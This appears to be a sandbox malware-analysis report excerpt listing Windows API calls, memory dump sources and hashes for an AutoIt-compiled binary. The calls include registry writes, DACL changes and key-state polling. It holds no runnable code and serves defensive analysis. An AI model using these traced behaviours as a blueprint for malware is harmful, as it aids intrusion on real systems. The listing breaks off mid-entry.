                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E237D2
                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E237DD
                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00E237E6
                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E237F5
                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00E237FE
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E23805
                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00E23810
                                                                                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E23822
                                                                                                                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00E40C04,00000000), ref: 00E23838
                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00E23848
                                                                                                                                                                              • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00E2386E
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00E2388D
                                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E238AF
                                                                                                                                                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E23A9C
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                              • API String ID: 2211948467-2373415609
                                                                                                                                                                              • Opcode ID: d8f271d9a4aba66e206805d9067495477af1dd84af3d5d96ee0f958cb0c693ce
                                                                                                                                                                              • Instruction ID: d326b122d3443caa0cac9a21dcecd4acb4576a2ae41e6e0c8f3e4a48c8a46a89
                                                                                                                                                                              • Opcode Fuzzy Hash: d8f271d9a4aba66e206805d9067495477af1dd84af3d5d96ee0f958cb0c693ce
                                                                                                                                                                              • Instruction Fuzzy Hash: 56028C71900219AFDB14DF65DC8DEAE7BB9FB49310F048118F919AB2A0CB74AE45CF60
                                                                                                                                                                              APIs
                                                                                                                                                                              • DestroyWindow.USER32(?,?), ref: 00DA16B4
                                                                                                                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 00DE2B07
                                                                                                                                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00DE2B40
                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00DE2F85
                                                                                                                                                                                • Part of subcall function 00DA1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00DA1488,?,00000000,?,?,?,?,00DA145A,00000000,?), ref: 00DA1865
                                                                                                                                                                              • SendMessageW.USER32(?,00001053), ref: 00DE2FC1
                                                                                                                                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00DE2FD8
                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?), ref: 00DE2FEE
                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?), ref: 00DE2FF9
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                              • String ID: 0$($($(
                                                                                                                                                                              • API String ID: 2760611726-1684351147
                                                                                                                                                                              • Opcode ID: 581429914f5aa9a945265f14193d0a542a9affc0ac50528053856de52c49be0a
                                                                                                                                                                              • Instruction ID: b4927a916b96bc4d91682c487acaae969b9e652bfecc9139c53c61a7fc678f5c
                                                                                                                                                                              • Opcode Fuzzy Hash: 581429914f5aa9a945265f14193d0a542a9affc0ac50528053856de52c49be0a
                                                                                                                                                                              • Instruction Fuzzy Hash: B612AE34204241EFD725EF16C848BB9BBE9FB45300F1C4569F699EB261C731E886CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • DestroyWindow.USER32(00000000), ref: 00E2319B
                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00E232C7
                                                                                                                                                                              • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00E23306
                                                                                                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00E23316
                                                                                                                                                                              • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00E2335D
                                                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 00E23369
                                                                                                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00E233B2
                                                                                                                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00E233C1
                                                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 00E233D1
                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00E233D5
                                                                                                                                                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00E233E5
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E233EE
                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 00E233F7
                                                                                                                                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00E23423
                                                                                                                                                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 00E2343A
                                                                                                                                                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00E2347A
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00E2348E
                                                                                                                                                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 00E2349F
                                                                                                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00E234D4
                                                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 00E234DF
                                                                                                                                                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00E234EA
                                                                                                                                                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00E234F4
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                              • API String ID: 2910397461-517079104
                                                                                                                                                                              • Opcode ID: 85995721c23fe93841bc34dface29ad486b8bb61e1706a09376c05c1a363fc76
                                                                                                                                                                              • Instruction ID: c4e1e77c036d060ccb1860c1c0f7d57dde25d6a24c8f399bbef1c5ad8f1c32a8
                                                                                                                                                                              • Opcode Fuzzy Hash: 85995721c23fe93841bc34dface29ad486b8bb61e1706a09376c05c1a363fc76
                                                                                                                                                                              • Instruction Fuzzy Hash: 11B12E71A00219BFDB14DFB5DC49FAE7BB9EB44710F004119FA15A72A0D774AD44CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 00E15532
                                                                                                                                                                              • GetDriveTypeW.KERNEL32(?,00E3DC30,?,\\.\,00E3DCD0), ref: 00E1560F
                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,00E3DC30,?,\\.\,00E3DCD0), ref: 00E1577B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorMode$DriveType
                                                                                                                                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                              • API String ID: 2907320926-4222207086
                                                                                                                                                                              • Opcode ID: 69d2cae2baa9b0c98534ed1a82342af864d7c0e5374bb9296a4e2db016170886
                                                                                                                                                                              • Instruction ID: f704fe619ae13950c7d2936a9c89d5171059359688135e41132e45b44203b5d1
                                                                                                                                                                              • Opcode Fuzzy Hash: 69d2cae2baa9b0c98534ed1a82342af864d7c0e5374bb9296a4e2db016170886
                                                                                                                                                                              • Instruction Fuzzy Hash: 93613632A48A05DFC724DF24D9928FCB7A1EF85398B246416E446BB2D1C771DD81CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00DA25F8
                                                                                                                                                                              • GetSystemMetrics.USER32(00000007), ref: 00DA2600
                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00DA262B
                                                                                                                                                                              • GetSystemMetrics.USER32(00000008), ref: 00DA2633
                                                                                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 00DA2658
                                                                                                                                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00DA2675
                                                                                                                                                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00DA2685
                                                                                                                                                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00DA26B8
                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00DA26CC
                                                                                                                                                                              • GetClientRect.USER32(00000000,000000FF), ref: 00DA26EA
                                                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 00DA2706
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00DA2711
                                                                                                                                                                                • Part of subcall function 00DA19CD: GetCursorPos.USER32(?), ref: 00DA19E1
                                                                                                                                                                                • Part of subcall function 00DA19CD: ScreenToClient.USER32(00000000,?), ref: 00DA19FE
                                                                                                                                                                                • Part of subcall function 00DA19CD: GetAsyncKeyState.USER32(00000001), ref: 00DA1A23
                                                                                                                                                                                • Part of subcall function 00DA19CD: GetAsyncKeyState.USER32(00000002), ref: 00DA1A3D
                                                                                                                                                                              • SetTimer.USER32(00000000,00000000,00000028,00DA199C), ref: 00DA2738
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                              • String ID: <)$<)$AutoIt v3 GUI$($($(
                                                                                                                                                                              • API String ID: 1458621304-3080182634
                                                                                                                                                                              • Opcode ID: b69485e1071a1ba4d1ffcb439cd3bab7aea526d77478425c66f895ebf1987754
                                                                                                                                                                              • Instruction ID: 060f1c7975e3a44ce58ae84525b46f8cc00df1ced403534e2c289577be5eb850
                                                                                                                                                                              • Opcode Fuzzy Hash: b69485e1071a1ba4d1ffcb439cd3bab7aea526d77478425c66f895ebf1987754
                                                                                                                                                                              • Instruction Fuzzy Hash: 81B17D31A002099FDB14DFAADC89BBE7BB5FB88314F144219FA19A7290C770D944CF61
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 00E31BC4
                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00E31BD9
                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 00E31BE0
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E31C35
                                                                                                                                                                              • DestroyWindow.USER32(?), ref: 00E31C55
                                                                                                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00E31C89
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E31CA7
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E31CB9
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000421,?,?), ref: 00E31CCE
                                                                                                                                                                              • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00E31CE1
                                                                                                                                                                              • IsWindowVisible.USER32(00000000), ref: 00E31D3D
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00E31D58
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00E31D6C
                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00E31D84
                                                                                                                                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00E31DAA
                                                                                                                                                                              • GetMonitorInfoW.USER32(00000000,?), ref: 00E31DC4
                                                                                                                                                                              • CopyRect.USER32(?,?), ref: 00E31DDB
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000412,00000000), ref: 00E31E46
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                              • String ID: ($0$tooltips_class32
                                                                                                                                                                              • API String ID: 698492251-4156429822
                                                                                                                                                                              • Opcode ID: f748c1f8121a82b6a55d5cf0e5af6d09a5b130e4272dfa0b45085af60e3b2132
                                                                                                                                                                              • Instruction ID: 548ae83a1dff8ba2880c887ed0a7ea1b263772bb9f8f62c5f011c365869ce4ae
                                                                                                                                                                              • Opcode Fuzzy Hash: f748c1f8121a82b6a55d5cf0e5af6d09a5b130e4272dfa0b45085af60e3b2132
                                                                                                                                                                              • Instruction Fuzzy Hash: 19B18A71608301AFD714DF65C889A6AFFE5FF84314F00995CF999AB2A1C731E844CBA2
                                                                                                                                                                              APIs
                                                                                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00E30D81
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E30DBB
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E30E25
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E30E8D
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E30F11
                                                                                                                                                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00E30F61
                                                                                                                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E30FA0
                                                                                                                                                                                • Part of subcall function 00DBFD52: _wcslen.LIBCMT ref: 00DBFD5D
                                                                                                                                                                                • Part of subcall function 00E02B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E02BA5
                                                                                                                                                                                • Part of subcall function 00E02B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E02BD7
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                              • API String ID: 1103490817-719923060
                                                                                                                                                                              • Opcode ID: 5336427737c9b93792b623202fe91fcc3437a1c0b22299003c92c5fa72e3f29c
                                                                                                                                                                              • Instruction ID: dc4ac213ff40c7584711d0b07882de0be5090454a107198c9aeebaf644315a59
                                                                                                                                                                              • Opcode Fuzzy Hash: 5336427737c9b93792b623202fe91fcc3437a1c0b22299003c92c5fa72e3f29c
                                                                                                                                                                              • Instruction Fuzzy Hash: 13E101312083418FCB14DF24C96586ABBE6FF85358F14596CF896AB3A1CB31ED45CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00E01A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E01A60
                                                                                                                                                                                • Part of subcall function 00E01A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00E014E7,?,?,?), ref: 00E01A6C
                                                                                                                                                                                • Part of subcall function 00E01A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E014E7,?,?,?), ref: 00E01A7B
                                                                                                                                                                                • Part of subcall function 00E01A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E014E7,?,?,?), ref: 00E01A82
                                                                                                                                                                                • Part of subcall function 00E01A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E01A99
                                                                                                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E01741
                                                                                                                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E01775
                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00E0178C
                                                                                                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00E017C6
                                                                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E017E2
                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00E017F9
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00E01801
                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00E01808
                                                                                                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E01829
                                                                                                                                                                              • CopySid.ADVAPI32(00000000), ref: 00E01830
                                                                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E0185F
                                                                                                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E01881
                                                                                                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E01893
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E018BA
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00E018C1
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E018CA
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00E018D1
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E018DA
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00E018E1
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00E018ED
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00E018F4
                                                                                                                                                                                • Part of subcall function 00E01ADF: GetProcessHeap.KERNEL32(00000008,00E014FD,?,00000000,?,00E014FD,?), ref: 00E01AED
                                                                                                                                                                                • Part of subcall function 00E01ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00E014FD,?), ref: 00E01AF4
                                                                                                                                                                                • Part of subcall function 00E01ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00E014FD,?), ref: 00E01B03
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4175595110-0
                                                                                                                                                                              • Opcode ID: 2392fef293500470ce3f06bfe97e2ce817a1cf2c8033cab3e210b8d8c6ad57c9
                                                                                                                                                                              • Instruction ID: 19120018f586ee9977283517a438f8abaa3b324814384a7af21e8a81e962430e
                                                                                                                                                                              • Opcode Fuzzy Hash: 2392fef293500470ce3f06bfe97e2ce817a1cf2c8033cab3e210b8d8c6ad57c9
                                                                                                                                                                              • Instruction Fuzzy Hash: D9715AB2D04209AFEB109FA5EC48FAEBBB9BF04714F188165F915BA190D7319A45CB70
                                                                                                                                                                              APIs
                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E2CF1D
                                                                                                                                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,00E3DCD0,00000000,?,00000000,?,?), ref: 00E2CFA4
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00E2D004
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E2D054
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E2D0CF
                                                                                                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00E2D112
                                                                                                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00E2D221
                                                                                                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00E2D2AD
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00E2D2E1
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00E2D2EE
                                                                                                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00E2D3C0
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
